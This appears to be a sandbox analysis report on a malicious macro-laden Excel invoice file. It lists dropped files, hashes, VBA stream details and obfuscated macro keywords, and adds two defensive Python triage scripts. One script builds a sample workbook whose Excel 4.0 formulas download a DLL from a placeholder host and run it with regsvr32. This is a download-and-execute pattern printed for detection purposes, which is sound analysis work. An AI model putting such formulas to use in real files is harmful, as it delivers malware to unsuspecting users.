                                                                                                                                      Preview: L..................F...........7G..0..m....0..m.....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....,RyM..Desktop.d......QK.X,RyM*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INV2680371456-20210111889374.LNK
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Tue Jan 12 08:43:48 2021, atime=Tue Jan 12 08:43:57 2021, length=58650, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2218
                                                                                                                                      Entropy (8bit):4.4914034227972355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8k/XT3InSiw163F5Qh2k/XT3InSiw163F5Q/:8k/XLInSiB3F5Qh2k/XLInSiB3F5Q/
                                                                                                                                      MD5:4EA962FE3171FDDE0C6D41EA1211CB3B
                                                                                                                                      SHA1:0A1DB0B6D7F44C03709960150B1119B1AC233684
                                                                                                                                      SHA-256:DA295B28EC71F72B4A3D8006C24C460F23A7EA124FE70FFB23D284B0AD090916
                                                                                                                                      SHA-512:399B3E6EC4421A8905E528E1D16437D504747C2F2BE3507062B03856BEA11CCF60798DEA59C1596A0D2F001B1BEFE65715CEA6E41DCA87332191BE0FB3ECFECD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: L..................F.... ........{..0..m.....Lwr.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....,RqM .INV268~1.XLS..p.......Q.y.Q.y*...8.....................I.N.V.2.6.8.0.3.7.1.4.5.6.-.2.0.2.1.0.1.1.1.8.8.9.3.7.4...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\INV2680371456-20210111889374.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.2.6.8.0.3.7.1.4.5.6.-.2.0.2.1.0.1.1.1.8.8.9.3.7.4...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):139
                                                                                                                                      Entropy (8bit):4.6224865058942335
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:oyBVomxWnnDd8ShydJSRpuYVo0Dd8ShydJSRpuYVomxWnnDd8ShydJSRpuYVov:djUnB80OJSPFp80OJSPFUnB80OJSPFy
                                                                                                                                      MD5:369122AC7CEDA0BC3A63AB9309D3AA13
                                                                                                                                      SHA1:66056E70235BD61BD6501299F7675A519E45F1B9
                                                                                                                                      SHA-256:CC1244B23024A8BA38D6A909FB5957FE7351CD4A3A62C57D08663E1A8F5B5C80
                                                                                                                                      SHA-512:E4C27FB0DC48F55EDE0FAB82B4C1CC9B0591810249253EAD2A96EFBFA9DE1595D9CAAC89F44EB356541DB02B6730096F27007F90799BE7673191E35FF2230C9E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: Desktop.LNK=0..[misc]..INV2680371456-20210111889374.LNK=0..INV2680371456-20210111889374.LNK=0..[misc]..INV2680371456-20210111889374.LNK=0..
                                                                                                                                      C:\Users\user\Desktop\A8FE0000
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):58650
                                                                                                                                      Entropy (8bit):7.85991707505314
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:hde8RzggbLmCf6646CIKISBHiXL2ICmVsLNFqoc:hN1rmCM2FW2Lpn+tc
                                                                                                                                      MD5:32AB480ACD87728B7BE8DE4D0B831587
                                                                                                                                      SHA1:25EE2034D7D69B77EB6C1839AB9FB5EEB3A60730
                                                                                                                                      SHA-256:3214DFD0A066B348C10D0D5EBA282931CBBA07A5361733EF1E887D1A7E61536E
                                                                                                                                      SHA-512:B5C3B68F1A2AB4EEB3040FA2ADC8B369A4BAA16DDFBE74F44CA00F37442DE48050DA795B3DE02A1431DAE9AC7F36BDB06C50973046847EC2E13A9D2EB3A73347
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\Desktop\~$INV2680371456-20210111889374.xlsm
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):330
                                                                                                                                      Entropy (8bit):1.4377382811115937
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
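The dropped-files listing above is the kind of record a triage script keys on: the entry for aymakjne.dll shows EXCEL.EXE writing a PE32 DLL into the user's Temp directory, which is worth an alert on its own regardless of the AV verdict. The Python below is an added example, not the sandbox's own parser. It reads records in this report's layout (a path line followed by Key:Value lines; the three records embedded here are a constructed sample copied from entries above) and grades each one. Note that the sandbox's Malicious flag alone is a poor discriminator: the ~$INV2680371456-20210111889374.xlsm entry is flagged Malicious:true yet is Excel's ordinary owner/lock file, so the process-to-file-type pairing drives the severity and the flag only adds a reason.

```python
import re

# Key names used by the report's per-file records; anything else starts a new record.
KEYS = ("Process", "File Type", "Category", "Size (bytes)", "Entropy (8bit)", "Encrypted",
        "SSDEEP", "MD5", "SHA1", "SHA-256", "SHA-512", "Malicious", "Antivirus", "Preview")
KEY_RE = re.compile(r"^(%s):(.*)$" % "|".join(re.escape(k) for k in KEYS))

OFFICE_PROCESSES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Directory fragments a low-privilege process can always write to (lower-cased for matching).
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")

# Constructed sample: three records copied from the dropped-files listing in this report.
SAMPLE_RECORDS = r"""
C:\Users\user\AppData\Local\Temp\WER540A.tmp.WERInternalMetadata.xml
Process:C:\Windows\System32\DWWIN.EXE
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):3110
MD5:544F11F1848CAA1BDF520C7BF1537FD7
Malicious:false
C:\Users\user\AppData\Local\Temp\aymakjne.dll
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):318976
MD5:8E5596083FD4C3134204E905F7F66325
SHA-256:8110E38AFD33797465AB43841B1C54ABFF7A25ACC30FA27C2623966750D34737
Malicious:true
C:\Users\user\Desktop\~$INV2680371456-20210111889374.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
MD5:96114D75E30EBD26B572C1FC83D1D02E
Malicious:true
"""


def parse_records(text):
    """Group the flat Key:Value lines into one dict per dropped file."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2).strip()
        else:
            current = {"Path": line}  # a non-key line is the path that opens a record
            records.append(current)
    return records


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(records):
    """Return (path, hash, severity, reasons) for every record worth a second look."""
    findings = []
    for r in records:
        reasons = []
        proc = basename(r.get("Process", ""))
        ftype = r.get("File Type", "")
        if proc in OFFICE_PROCESSES and ftype.startswith("PE32"):
            reasons.append("office process wrote a PE file")
            if any(seg in r["Path"].lower() for seg in USER_WRITABLE):
                reasons.append("PE landed in a user-writable staging directory")
        if r.get("Malicious", "").lower() == "true":
            reasons.append("sandbox Malicious flag set")
        if not reasons:
            continue
        # Behaviour (Office -> PE) outranks the sandbox verdict, which also fires on the lock file.
        severity = "high" if reasons[0].startswith("office process") else "review"
        findings.append((r["Path"], r.get("SHA-256") or r.get("MD5"), severity, reasons))
    return findings


if __name__ == "__main__":
    for path, digest, severity, reasons in triage(parse_records(SAMPLE_RECORDS)):
        print(f"[{severity}] {path} ({digest}): {'; '.join(reasons)}")
```

On a real report the same parser can be fed the whole dropped-files section; the WER metadata written by DWWIN.EXE and the LNK files in Office\Recent drop out as noise, while the DLL in Temp surfaces with its SHA-256 ready for a blocklist or hunt query.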

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                      Entropy (8bit):7.77272893585129
                                                                                                                                      TrID:
                                                                                                                                      • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                      • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                      File name:INV2680371456-20210111889374.xlsm
                                                                                                                                      File size:42039
                                                                                                                                      MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
                                                                                                                                      SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
                                                                                                                                      SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0
                                                                                                                                      SHA512:4c92f1fdbd83eb8e38e93800d2620c328ac59de4d5cdef9e8fbbcfc02fe715f110db49a83880ef0726fb1224d140472abf341b22fa7710710a69f061aa880840
                                                                                                                                      SSDEEP:768:IHT0FIYwYlKUOaSqlRgzxTLKLls5QlHbdYoVq+:uYwQKUOVqlRgzxTOLpZYAq+
                                                                                                                                      File Content Preview:PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:e4e2aa8aa4bcbcac

                                                                                                                                      Static OLE Info

                                                                                                                                      General

                                                                                                                                      Document Type:OpenXML
                                                                                                                                      Number of OLE Files:2

                                                                                                                                      OLE File "/opt/package/joesandbox/database/analysis/338309/sample/INV2680371456-20210111889374.xlsm"

                                                                                                                                      Indicators

                                                                                                                                      Has Summary Info:False
                                                                                                                                      Application Name:unknown
                                                                                                                                      Encrypted Document:False
                                                                                                                                      Contains Word Document Stream:
                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                      Flash Objects Count:
                                                                                                                                      Contains VBA Macros:True
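The indicators above establish only that the container is OpenXML and carries a VBA project (Contains VBA Macros:True); they do not show where the executable content lives. Because an .xlsm is a ZIP package, the static check a practitioner wants is to open it, look for xl/vbaProject.bin and any xl/macrosheets/ parts, resolve which sheets the workbook marks hidden or veryHidden, and scan the macro-sheet formulas for the Excel 4.0 functions that download and run code. The Python below is an added example, not the report's tooling: it builds a constructed minimal .xlsm in memory (the placeholder URL, DLL path and VBA stub are assumptions, not values from this sample) and runs that inspection over it. inspect_xlsm() accepts raw bytes, so the same function can be pointed at a real file.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Excel 4.0 (XLM) functions that give a macro sheet download or code-execution capability.
SUSPICIOUS_XLM = ("EXEC", "CALL", "REGISTER", "FORMULA", "URLDownloadToFile", "ShellExecute")


def build_sample_xlsm() -> bytes:
    """Constructed minimal .xlsm: one visible worksheet, one veryHidden Excel 4.0
    macro sheet and a placeholder vbaProject.bin. Not the analysed sample."""
    content_types = """<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="xml" ContentType="application/xml"/>
  <Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>
</Types>"""
    workbook = """<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
  xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>
  </sheets>
</workbook>"""
    rels = """<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>
  <Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/>
  <Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>
</Relationships>"""
    worksheet = """<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData/></worksheet>"""
    # Constructed formulas illustrating the download-then-execute XLM pattern; the URL
    # and the DLL path are placeholders, not values taken from this report.
    macrosheet = r"""<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
  xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
  <sheetData>
    <row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/p.dll","C:\Users\user\AppData\Local\Temp\p.dll",0,0)</f></c></row>
    <row r="2"><c r="A2"><f>EXEC("regsvr32 /s C:\Users\user\AppData\Local\Temp\p.dll")</f></c></row>
    <row r="3"><c r="A3"><f>HALT()</f></c></row>
  </sheetData>
</xm:macrosheet>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("xl/workbook.xml", workbook)
        zf.writestr("xl/_rels/workbook.xml.rels", rels)
        zf.writestr("xl/worksheets/sheet1.xml", worksheet)
        zf.writestr("xl/macrosheets/sheet1.xml", macrosheet)
        zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")  # OLE magic only, not a real project
    return buf.getvalue()


def inspect_xlsm(data: bytes) -> dict:
    """Static triage of an OOXML workbook: VBA presence, XLM macro sheets,
    hidden sheet states and suspicious Excel 4.0 formulas."""
    zf = zipfile.ZipFile(io.BytesIO(data))
    names = zf.namelist()
    report = {
        "has_vba": "xl/vbaProject.bin" in names,
        "macrosheets": [n for n in names if n.startswith("xl/macrosheets/")],
        "hidden_sheets": [],        # (name, state, relationship kind, target part)
        "suspicious_formulas": [],  # (part, formula excerpt, matched functions)
    }
    # Resolve r:id -> (kind, target) so a hidden sheet can be tied to its part type.
    rels = {}
    if "xl/_rels/workbook.xml.rels" in names:
        for rel in ET.fromstring(zf.read("xl/_rels/workbook.xml.rels")):
            rels[rel.get("Id")] = (rel.get("Type", "").rsplit("/", 1)[-1], rel.get("Target"))
    wb = ET.fromstring(zf.read("xl/workbook.xml"))
    for sheet in wb.iter(f"{{{NS_MAIN}}}sheet"):
        state = sheet.get("state", "visible")  # visible | hidden | veryHidden
        kind, target = rels.get(sheet.get(f"{{{NS_REL}}}id"), ("?", "?"))
        if state != "visible":
            report["hidden_sheets"].append((sheet.get("name"), state, kind, target))
    for part in report["macrosheets"]:
        for f in ET.fromstring(zf.read(part)).iter(f"{{{NS_MAIN}}}f"):
            formula = f.text or ""
            hits = [k for k in SUSPICIOUS_XLM if re.search(rf"\b{k}", formula, re.I)]
            if hits:
                report["suspicious_formulas"].append((part, formula[:80], hits))
    return report


if __name__ == "__main__":
    for key, value in inspect_xlsm(build_sample_xlsm()).items():
        print(f"{key}: {value}")
```

The relationship file is resolved rather than trusting part names because OOXML lets a writer place a macro sheet under any path; matching on xl/macrosheets/ alone would miss a repackaged document, whereas the xlMacrosheet relationship type does not. A veryHidden state is the signal to weight most, since it cannot be undone from Excel's Unhide dialog and has no legitimate reason to sit on a macro sheet in an invoice.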

                                                                                                                                      Summary

                                                                                                                                      Author:
                                                                                                                                      Last Saved By:
                                                                                                                                      Create Time:2020-12-07T14:38:21Z
                                                                                                                                      Last Saved Time:2021-01-11T14:32:26Z
                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                      Security:0

                                                                                                                                      Document Summary

                                                                                                                                      Thumbnail Scaling Desired:false
                                                                                                                                      Company:
                                                                                                                                      Contains Dirty Links:false
                                                                                                                                      Shared Document:false
                                                                                                                                      Changed Hyperlinks:false
                                                                                                                                      Application Version:16.0300

                                                                                                                                      Streams with VBA

                                                                                                                                      VBA File Name: Module1.bas, Stream Size: 3215
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/Module1
                                                                                                                                      VBA File Name:Module1.bas
                                                                                                                                      Stream Size:3215
                                                                                                                                      Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                      VBA Code Keywords

                                                                                                                                      Keyword
                                                                                                                                      Integer:
                                                                                                                                      bycilke()
                                                                                                                                      VB_Name
                                                                                                                                      MiV(sem.value)
                                                                                                                                      homepodd()
                                                                                                                                      homepodd
                                                                                                                                      Error
                                                                                                                                      Integer)
                                                                                                                                      bycilke
                                                                                                                                      Function
                                                                                                                                      ol).Name
                                                                                                                                      "!"):
                                                                                                                                      String
                                                                                                                                      "ab":
                                                                                                                                      Split(govs,
                                                                                                                                      Randomize:
                                                                                                                                      yellowsto(yel
                                                                                                                                      Next:
                                                                                                                                      ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
                                                                                                                                      yellowsto(Oa))))
                                                                                                                                      Integer
                                                                                                                                      yellowsto
                                                                                                                                      ol).value
                                                                                                                                      nimo(Int((UBound(nimo)
                                                                                                                                      Replace(Vo,
                                                                                                                                      Chr(sem.Row)
                                                                                                                                      Sheets(ol).Cells(homepodd,
                                                                                                                                      "ab"))
                                                                                                                                      Split(kij(ol),
                                                                                                                                      yellowsto(homepodd))
                                                                                                                                      Rnd))
                                                                                                                                      (Run(""
                                                                                                                                      "moreP_"
                                                                                                                                      Variant)
                                                                                                                                      Attribute
                                                                                                                                      Resume
                                                                                                                                      pagesREviewsd(Optional
                                                                                                                                      ecimovert(nimo
                                                                                                                                      ecimovert
                                                                                                                                      MsgBox
                                                                                                                                      VBA Code
                                                                                                                                      VBA File Name: Sheet1.cls, Stream Size: 1639
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/Sheet1
                                                                                                                                      VBA File Name:Sheet1.cls
                                                                                                                                      Stream Size:1639
                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
                                                                                                                                      Data Raw:01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 fb 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                      VBA Code Keywords

                                                                                                                                      Keyword
                                                                                                                                      Index
                                                                                                                                      VB_Name
                                                                                                                                      VB_Creatable
                                                                                                                                      Application.OnTime
                                                                                                                                      VB_Exposed
                                                                                                                                      Long)
                                                                                                                                      ResizePagess()
                                                                                                                                      VB_Customizable
                                                                                                                                      "REviewsd"
                                                                                                                                      VB_Control
                                                                                                                                      MultiPage"
                                                                                                                                      VB_TemplateDerived
                                                                                                                                      MSForms,
                                                                                                                                      False
                                                                                                                                      Attribute
                                                                                                                                      Private
                                                                                                                                      VB_PredeclaredId
                                                                                                                                      VB_GlobalNameSpace
                                                                                                                                      VB_Base
                                                                                                                                      ResizePagess
                                                                                                                                      "pages"
                                                                                                                                      VBA Code
                                                                                                                                      VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/ThisWorkbook
                                                                                                                                      VBA File Name:ThisWorkbook.cls
                                                                                                                                      Stream Size:999
                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                      VBA Code Keywords

                                                                                                                                      Keyword
                                                                                                                                      False
                                                                                                                                      VB_Exposed
                                                                                                                                      Attribute
                                                                                                                                      VB_Name
                                                                                                                                      VB_Creatable
                                                                                                                                      "ThisWorkbook"
                                                                                                                                      VB_PredeclaredId
                                                                                                                                      VB_GlobalNameSpace
                                                                                                                                      VB_Base
                                                                                                                                      VB_Customizable
                                                                                                                                      VB_TemplateDerived
                                                                                                                                      VBA Code

                                                                                                                                      Streams

                                                                                                                                      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550
                                                                                                                                      General
                                                                                                                                      Stream Path:PROJECT
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Stream Size:550
                                                                                                                                      Entropy:5.28107922141
                                                                                                                                      Base64 Encoded:True
                                                                                                                                      Data ASCII:I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 0 - D B B 2 9 D 5 C 1 4 7 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E E E C 1 D 3 1 E 5 F 1 D 7 F 5 D 7 F 5 D 7 F 5 D 7 F 5 " . . D P B = " D C D E 2 F 3 F F 3 2 C F 4 2 C F 4 2 C "
                                                                                                                                      Data Raw:49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 30 2d 44 42 42 32 39 44 35 43 31 34 37 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d
                                                                                                                                      Stream Path: PROJECTwm, File Type: data, Stream Size: 86
                                                                                                                                      General
                                                                                                                                      Stream Path:PROJECTwm
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:86
                                                                                                                                      Entropy:3.24455457963
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                                                                                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                                                                                                      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/_VBA_PROJECT
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:3574
                                                                                                                                      Entropy:4.45079869926
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
